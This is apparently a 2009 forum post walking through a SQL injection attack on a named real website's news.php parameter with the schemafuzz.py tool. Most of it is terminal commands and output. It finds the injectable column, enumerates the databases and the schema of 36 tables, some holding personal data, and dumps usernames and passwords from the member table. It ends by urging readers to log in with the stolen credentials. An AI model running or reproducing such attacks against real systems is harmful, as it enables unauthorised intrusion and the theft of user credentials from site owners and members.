SQLi using Schemafuzz
Posted: Sat Jun 13, 2009 1:33 am
The site is malingshit...
root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561 --findcol
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://ccs.my/news.php?id=1561--
[+] Evasion Used: "+" "--"
[+] 06:15:17
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] darkc0de URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5
[-] Done!
root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dbs
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:17:31
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 2
[0] ccs_myccs
[1] test
[-] 06:17:50
[-] Total URL Requests 4
[-] Done
Don't forget to check schemafuzzlog.txt
root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --schema -D ccs_myccs
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:19:09
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing Tables & Columns from database "ccs_myccs"
[+] Number of Tables: 36
[Database]: ccs_myccs
[Table: Columns]
[0]addressbook: id,cat_id,cat_id2,cat_id3,update_date,submit_date,name,person,ic,gender,add1,add2,add3,tel,hp,fax,username,password,email,note
[1]addressbook_cat: id,sub_id,name
[2]addressbook_pc: id,add_id,submit_date,name,cpu,ram,hd,vga,sound,cdrom,drive,keyboard,mouse,usb,port,networking,os,antivirus
[3]addressbook_pc_report: id,add_id,submit_date,name,note
[4]cat: id,name,image,visit,bodytag,keyword,desc,description
[5]consignment: id,customer_id,borrow,name,user
[6]enquiry: user_id,area_id,update_date,submit_date,company,name,gender,add1,add2,postcode,home,office,fax,mobile,email,ic,passport,nationality,os,dealer,note
[7]enquiry_area: id,parent_id,top_id,name
[8]faq: id,cat_id,question,answer
[9]faqcat: id,name,visit,description
[10]hosting: id,update_date,name,owner,dealer,server_id,expire,price,note
[11]hostingserver: id,name
[12]invoice_item: id,invoice_id,update_date,submit_date,name,description,qty,price
[13]logs: id,date,name,description
[14]logs_hr: id,date,name,description
[15]member: id,area_id,update_date,submit_date,company,name,gender,add1,add2,username,office,fax,password,email,level,note,staff,dealer,hosting,member
[16]member_leave: id,member_id,update_date,submit_date,leave_date,name,status,note,total_day
[17]member_report: id,member_id,update_date,submit_date,report_date,name,report,total_hour
[18]member_sales: id,member_id,sales_id,update_date,submit_date,sales_date,account_date,bankin_date,name,note,payment,price,cost,profit
[19]member_task: id,customer_id,member_id,leader_id,access_id1,access_id2,access_id3,update_date,submit_date,followup_date,complete_date,name,status,note
[20]member_task_report: id,member_id,task_id,update_date,submit_date,note,time
[21]member_type: id,parent_id,top_id,name
[22]news: id,name,description,submit_date,update_date,visit
[23]package: id,name
[24]package_item: id,package_name_id,product_id
[25]package_name: id,package_id,name
[26]payment: id,update_date,submit_date,invoice_date,name,note,total,sold,paid
[27]po: id,customer_id,update_date,submit_date,name,username
[28]po_item: id,po_id,update_date,name,description,qty,retail,price,note,username
[29]products: id,date1,visit,name1,name2,weight,cat1,cat2,type1,type2,description,image1,image2,price,price_us,offer,dealer,wholesale,cost,note,seller,bodytag,code,date2,date3,stock,stock1,stock2,stock3
[30]products_reserve: id,product_id,customer_id,update_date,submit_date,name,taken_date,username
[31]quotation: id,cat_id,customer_id,dealer_id,update_date,submit_date,quotation_date,invoice_date,po_date,name,invoice,username,remark,regards
[32]quotation_cat: id,sub_id,name
[33]quotation_item: id,quotation_id,update_date,name,description,qty,price,cost,note,username
[34]stock: id,product_id,update_date,submit_date,name,username,log
[35]type: id,name,image,visit,bodytag
[-] 06:45:44
[-] Total URL Requests 315
[-] Done
Don't forget to check schemafuzzlog.txt
root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dump -D ccs_myccs -T member -C id,username,password
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|
[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:51:41
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Dumping data from database "ccs_myccs" Table "member"
[+] and Column(s) ['id', 'username', 'password']
[+] Number of Rows: 71
[-] 06:55:38
[-] Total URL Requests 73
[-] Done
Don't forget to check schemafuzzlog.txt
Next....
register as a member...
(because the login page for members is hidden)
then log in as a member whose username and password we have already obtained...